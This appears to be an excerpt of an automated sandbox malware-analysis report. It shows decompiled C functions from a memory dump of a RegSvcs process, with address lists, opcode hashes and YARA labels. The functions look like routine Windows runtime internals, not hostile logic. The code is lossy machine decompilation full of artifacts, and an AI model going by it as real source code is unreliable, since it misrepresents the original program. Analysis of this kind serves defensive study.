								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E00A4B6F0(0xa2c338, 0xa2c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E00A89520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E00A895D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E00A5FFB0(_t68, _t77, 0xb38778);
				}
				_pop(_t78);
				return E00A8B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x00ac69b5
0x00ac69be
0x00ac69c3
0x00ac69c9
0x00ac69cc
0x00ac69d1
0x00ac69d3
0x00ac69de
0x00ac69e1
0x00ac69ea
0x00ac69f6
0x00ac69fe
0x00ac6a13
0x00ac6a14
0x00ac6a15
0x00ac6a16
0x00ac6a1e
0x00ac6a26
0x00ac6a31
0x00ac6a36
0x00ac6a37
0x00ac6a40
0x00ac6a49
0x00ac6a4a
0x00ac6a53
0x00ac6a59
0x00ac6a5d
0x00ac6a5e
0x00ac6a64
0x00ac6a67
0x00ac6a6a
0x00ac6a6d
0x00ac6a70
0x00ac6a77
0x00ac6a7d
0x00ac6a86
0x00ac6a89
0x00ac6a9c
0x00ac6a9f
0x00ac6aa2
0x00ac6aa5
0x00ac6aaf
0x00ac6ab1
0x00ac6ab8
0x00ac6ab9
0x00ac6abb
0x00ac6abe
0x00ac6ac5
0x00ac6ac5
0x00ac6aaf
0x00ac6a40
0x00ac6a26
0x00ac69fe
0x00ac6ace
0x00ac6ad0
0x00ac6ad3
0x00ac6ad8
0x00ac6adf
0x00ac6adf
0x00ac6ae8
0x00ac6aef
0x00ac6aef
0x00ac6af9
0x00ac6b06

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d13301b39feb229fa4cdc84ce87800e90823679b0f959c6dd692f473cfc5d5
Instruction ID: e9a533849a4b700cd2e2bfd01e4f74f3ee3e8d716f142b09f57c001329f47a75
Opcode Fuzzy Hash: 66d13301b39feb229fa4cdc84ce87800e90823679b0f959c6dd692f473cfc5d5
Instruction Fuzzy Hash: 214195B1D00208AFDB24DFA8D941BFEBBF8FF48314F18812AE814A7251EB319905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A45210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00A45210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E00A452A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00A895D0();
							L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E00A5EB70(_t54, 0xb379a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E00A895D0();
								L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E00A5EB70(_t54, 0xb379a0);
						}
						return _t52;
					}
					L5:
					_t33 = E00A8F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E00A5EB70(_t54, 0xb379a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00A895D0();
							L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x00a45220
0x00a45224
0x00aa0d13
0x00aa0d16
0x00aa0d19
0x00a4522a
0x00a4522a
0x00a4522d
0x00a4522d
0x00a45231
0x00a45235
0x00a45239
0x00aa0d5c
0x00aa0d62
0x00000000
0x00000000
0x00aa0d6a
0x00aa0d7b
0x00aa0d7f
0x00aa0d81
0x00aa0d84
0x00aa0d95
0x00aa0d95
0x00aa0d6c
0x00aa0d71
0x00aa0d71
0x00aa0d9a
0x00000000
0x00a4524a
0x00a4524a
0x00a45250
0x00aa0d24
0x00aa0d35
0x00aa0d39
0x00aa0d3b
0x00aa0d3e
0x00aa0d50
0x00aa0d50
0x00aa0d26
0x00aa0d2b
0x00aa0d2b
0x00000000
0x00aa0d55
0x00a45256
0x00a4525b
0x00a45265
0x00aa0da7
0x00a4526b
0x00a4526e
0x00a45272
0x00aa0db1
0x00aa0db4
0x00aa0dc5
0x00aa0dc5
0x00a45272
0x00a45278
0x00a4527e
0x00a4528a
0x00a4528c
0x00a4528d
0x00000000
0x00a45280
0x00a45282
0x00a45288
0x00a4529f
0x00a45292
0x00000000
0x00a45292
0x00000000
0x00a45288
0x00a4527e

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5a890690f6bfa5c1f57de5563df4d1b6a36be27c66a48f0110a73c1661e3d3d
Instruction ID: 742a54548ca11fd3408682e52c05b08dd653152dd694fafd2905f4635dec5f84
Opcode Fuzzy Hash: d5a890690f6bfa5c1f57de5563df4d1b6a36be27c66a48f0110a73c1661e3d3d
Instruction Fuzzy Hash: 3431F632651A01EBC726AF68C941F6A77B5FF51760F21462AF8164B5E2DB70FD00C790

Uniqueness

Uniqueness Score: -1.00%

Function 00A83D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A83D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E00A57B60(0, _t61, 0xa211c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E00A57B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L00A64620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x00a83d4c
0x00a83d50
0x00a83d55
0x00a83d5e
0x00abe79a
0x00000000
0x00abe79a
0x00a83d68
0x00abe789
0x00a83d9d
0x00a83da3
0x00a83daf
0x00a83db5
0x00a83dbc
0x00a83dc4
0x00a83dc9
0x00a83dce
0x00abe7ae
0x00abe7ae
0x00a83dde
0x00a83de2
0x00a83de7
0x00a83e0d
0x00a83e13
0x00a83e16
0x00a83e1e
0x00a83e25
0x00a83e28
0x00000000
0x00000000
0x00a83e2a
0x00a83e2f
0x00a83e37
0x00a83e37
0x00000000
0x00a83e37
0x00a83e31
0x00000000
0x00a83e31
0x00a83e20
0x00a83e20
0x00a83e35
0x00000000
0x00a83de9
0x00a83de9
0x00a83de9
0x00a83dee
0x00a83dfd
0x00a83dff
0x00a83e02
0x00a83e05
0x00a83e05
0x00000000
0x00a83df0
0x00a83de7
0x00abe78f
0x00abe794
0x00a83d79
0x00a83d84
0x00a83d89
0x00a83d8e
0x00000000
0x00abe7a4
0x00a83d96
0x00a83d9a
0x00000000
0x00a83d9a
0x00000000
0x00abe794
0x00a83d6e
0x00a83d73
0x00000000
0x00abe7b5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af01c0b97dfac7661058d572f02e3dffc9e23f4c5d644128252e8b497facde03
Instruction ID: cf8760f315a4d1aa6cb54fffc2acfc548c7cf3a65320d4599dfef18522f6af65
Opcode Fuzzy Hash: af01c0b97dfac7661058d572f02e3dffc9e23f4c5d644128252e8b497facde03
Instruction Fuzzy Hash: 0D31C032A05614DBCB24EF29D841ABBBBF5EF55B00B15846EE846CB351EB30DD80D790

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A7A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0xb20220);
				E00A9D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0xb37b9c; // 0x0
				_t55 = L00A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E00A9D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0xb37b10 =  *0xb37b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0xb3536c; // 0x776f5368
					if( *_t51 != 0xb35368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0xb35368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0xb3536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E00A7A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x00a7a61c
0x00a7a61e
0x00a7a623
0x00a7a628
0x00a7a62b
0x00a7a62d
0x00a7a648
0x00a7a64a
0x00a7a64f
0x00ab9b44
0x00a7a6ec
0x00a7a6f1
0x00a7a6f1
0x00a7a655
0x00a7a657
0x00a7a65a
0x00a7a65d
0x00a7a662
0x00a7a663
0x00a7a667
0x00a7a668
0x00a7a66d
0x00a7a706
0x00a7a706
0x00ab9bda
0x00ab9be6
0x00ab9beb
0x00000000
0x00ab9beb
0x00a7a679
0x00ab9b7a
0x00000000
0x00ab9b7a
0x00a7a683
0x00a7a6f4
0x00a7a6f7
0x00a7a6f9
0x00a7a6fd
0x00a7a6a0
0x00a7a6a0
0x00a7a6ad
0x00a7a6af
0x00a7a6b4
0x00ab9ba7
0x00ab9bac
0x00000000
0x00000000
0x00ab9bc6
0x00ab9bce
0x00ab9bd1
0x00ab9bd3
0x00ab9bd3
0x00000000
0x00ab9bd1
0x00a7a6bd
0x00a7a6c3
0x00a7a6c6
0x00a7a6d2
0x00a7a701
0x00a7a704
0x00000000
0x00a7a704
0x00a7a6d4
0x00a7a6d6
0x00a7a6d9
0x00a7a6db
0x00a7a6e1
0x00a7a6e6
0x00a7a6e8
0x00a7a6e8
0x00a7a6ea
0x00000000
0x00a7a6ea
0x00a7a688
0x00a7a692
0x00a7a694
0x00a7a699
0x00000000
0x00000000
0x00a7a69d
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 474cbc24b9d3a848672882d0dcfb19d4a0ce7ea55da7a1a6849751235c7ed984
Instruction ID: c7fd08e464fab058a49b8b6b0f6e69cdfb712aec76d2b8e48d7b662b9a375273
Opcode Fuzzy Hash: 474cbc24b9d3a848672882d0dcfb19d4a0ce7ea55da7a1a6849751235c7ed984
Instruction Fuzzy Hash: 5A4168B5A04215EFCB18CF58D890B9EBBF1BF99300F29C0A9E909AB351D774AD41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00AC7016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00AC7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0xb3d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E00AC6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E00AC6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E00A67D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E00A89AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E00A8B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L00A64620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x00ac7016
0x00ac701e
0x00ac702b
0x00ac7033
0x00ac7037
0x00ac703c
0x00ac703e
0x00ac7041
0x00ac7045
0x00ac704a
0x00ac7050
0x00ac7055
0x00ac705a
0x00ac7062
0x00ac7062
0x00ac705a
0x00ac7064
0x00ac7064
0x00ac7067
0x00ac7071
0x00ac7096
0x00ac709b
0x00ac70a2
0x00ac70a6
0x00ac70a7
0x00ac70ad
0x00ac70b3
0x00ac70b6
0x00ac70bb
0x00ac70c3
0x00ac70c3
0x00ac70c6
0x00ac70cd
0x00ac70dd
0x00ac70e0
0x00ac70e2
0x00ac70e2
0x00ac70ee
0x00ac7101
0x00ac70f0
0x00ac70f9
0x00ac70f9
0x00ac710a
0x00ac710e
0x00ac7112
0x00ac7117
0x00ac7118
0x00ac7118
0x00ac70bb
0x00ac711d
0x00ac7123
0x00ac7131
0x00ac7131
0x00ac7136
0x00ac713d
0x00ac713e
0x00ac713f
0x00ac714a
0x00ac714a
0x00ac7084
0x00ac7088
0x00000000
0x00ac708e
0x00ac708e
0x00ac7092
0x00000000
0x00ac7092

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbd4eaa1718c1c32b2eeeb93b6f1e858418043df6fb8a740e3a02d5d6cce08fe
Instruction ID: fa939f25113a2e93cd28344def2a07099e6c492669e74271919db876ff74add8
Opcode Fuzzy Hash: fbd4eaa1718c1c32b2eeeb93b6f1e858418043df6fb8a740e3a02d5d6cce08fe
Instruction Fuzzy Hash: E13170726087519BC321DF68C941F6EB7A9BF88700F054A2DF89597691E730ED04CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00A6C182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A6C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E00A67D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E00B18D34(_v8, _t80);
					}
					E00A62280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E00A5FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E00B18833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E00A5FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E00A8B180();
						if(_a4 != 0) {
							E00A62280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E00A6BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E00A6BB2D(_t16, _t15);
						E00A6B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E00A5FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E00A5FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E00A5FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x00a6c18d
0x00a6c18f
0x00a6c191
0x00a6c19b
0x00a6c1a0
0x00a6c1d4
0x00a6c1de
0x00ab2d6e
0x00a6c1e4
0x00a6c1e4
0x00a6c1e4
0x00a6c1ec
0x00ab2d7d
0x00ab2d7d
0x00a6c1f3
0x00a6c1ff
0x00ab2d88
0x00ab2d8d
0x00ab2d94
0x00ab2d94
0x00ab2d9f
0x00ab2da4
0x00ab2dab
0x00ab2db0
0x00ab2db2
0x00ab2db3
0x00ab2db4
0x00ab2dbc
0x00ab2dc3
0x00ab2dc3
0x00a6c205
0x00a6c205
0x00a6c208
0x00a6c20e
0x00a6c211
0x00a6c216
0x00a6c219
0x00a6c21f
0x00a6c222
0x00a6c22c
0x00a6c234
0x00a6c23a
0x00a6c23f
0x00a6c245
0x00a6c24b
0x00a6c251
0x00a6c25a
0x00a6c276
0x00a6c27d
0x00a6c27d
0x00a6c25c
0x00a6c25c
0x00000000
0x00a6c25e
0x00a6c1a4
0x00a6c1aa
0x00a6c1b3
0x00a6c265
0x00a6c26c
0x00a6c26c
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 1863154b459a7fd67e64b9ee8f006d0dcd54e85f3a9ca1fa1246415b92547d6d
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 6C314672A01586BED705EBB4C591BF9F7B4BF42314F14426AE85C87203DB386A49DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00A7A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0xb37b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0xb37b10 = 8;
					 *0xb37b14 = 0xb37b0c;
					 *0xb37b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E00A7A990(0xb37b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L00A7A840(__edx, __ecx, __ecx, _t52, 0xb37b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0xb37b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0xb37b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0xb37b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L00A64620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0xb37b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E00A8F3E0(_t50,  *0xb37b14, _t8 >> 3);
						_t28 =  *0xb37b14; // 0x0
						__eflags = _t28 - 0xb37b0c;
						if(_t28 != 0xb37b0c) {
							L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0xb37b14 = _t50;
						_t48 = _v12;
						 *0xb37b10 = _t9;
						goto L6;
					}
					 *0xb37b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x00a7a713
0x00a7a714
0x00a7a717
0x00a7a71d
0x00a7a720
0x00a7a722
0x00a7a727
0x00a7a74a
0x00a7a754
0x00a7a75e
0x00a7a768
0x00a7a76a
0x00a7a773
0x00a7a78b
0x00a7a790
0x00a7a792
0x00a7a741
0x00a7a741
0x00a7a743
0x00a7a749
0x00a7a749
0x00a7a732
0x00a7a73a
0x00a7a797
0x00a7a79d
0x00a7a7a3
0x00a7a7a9
0x00a7a7b6
0x00a7a7bc
0x00a7a7ca
0x00a7a7e0
0x00a7a7e2
0x00a7a7e4
0x00ab9bf2
0x00000000
0x00ab9bf2
0x00a7a7ed
0x00a7a7f2
0x00a7a800
0x00a7a805
0x00a7a80d
0x00a7a812
0x00ab9c08
0x00ab9c08
0x00a7a818
0x00a7a81b
0x00a7a821
0x00a7a824
0x00000000
0x00a7a824
0x00a7a7ae
0x00000000
0x00a7a7ae
0x00a7a73c
0x00a7a73e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f577c51c48e044944cd22cc0c7d6810236966d6c7108050e79e09868ad7166f
